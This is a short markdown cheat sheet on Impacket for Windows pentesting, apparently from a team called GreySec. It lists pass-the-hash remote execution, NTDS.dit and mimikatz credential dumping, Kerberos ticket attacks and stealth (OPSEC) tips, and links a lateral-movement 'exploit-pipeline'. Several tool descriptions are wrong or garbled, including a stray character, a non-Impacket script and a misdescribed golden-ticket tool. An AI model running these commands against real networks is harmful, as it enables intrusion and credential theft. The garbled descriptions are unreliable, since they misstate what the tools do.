# Impacket Usage Reference

## Overview

Impacket is a collection of Python classes for working with network protocols. Core tool for Windows pentesting.

## Installation

```bash
pip install impacket
# Or from source:
git clone https://github.com/fortra/impacket
cd impacket && pip install .
```

## Key Scripts

### Remote Execution

```bash
# psexec.py - Pass-the-Hash
python3 psexec.py DOMAIN/user@target.lan -hashes lm:ntlm

# wmiexec.py - Stealth WMI exec
python3 wmiexec.py DOMAIN/user@target.lan -hashes lm:ntlm

# atexec.py - Scheduled task exec
python3 atexec.py DOMAIN/user@target.lan -hashes lm:ntlm
```

### Credential Extraction

```bash
# secretsdump.py - NTDS.dit extraction
python3 secretsdump.py DOMAIN/user@target.lan -hashes lm:ntlm

# mimikatz.py - Remote mimikatz
python3 mimikatz.py DOMAIN/user@target.lan -hashes lm:ntlm
```

### Kerberos Attacks

```bash
# getTGT.py - Ticket extraction
python3 getTGT.py DOMAIN/user:password

# goldenPac.py - Golden ticket + auto-exec
python3 goldenPac.py DOMAIN/user@target.lan
```

### Network Discovery

```bash
# smbclient.py - Anonymous SMB share browsing
python3 smbclient.py DOMAIN/user@target.lan

# rpcclient.py - RPC bind蔷
python3 rpcclient.py target.lan -N
```

## OPSEC Notes

- wmiExec leaves fewer artifacts than psexec
- Use -dc-ip for Kerberoasting
- secretsdump requires domain admin or NTDS.dit access
- Always check firewall rules before port scanning

## GreySec Engagement Notes

Used in: `exploit-pipeline` for lateral movement automation.
See: https://gsfiles.tail57cd.ts.net/greysec/exploit-pipeline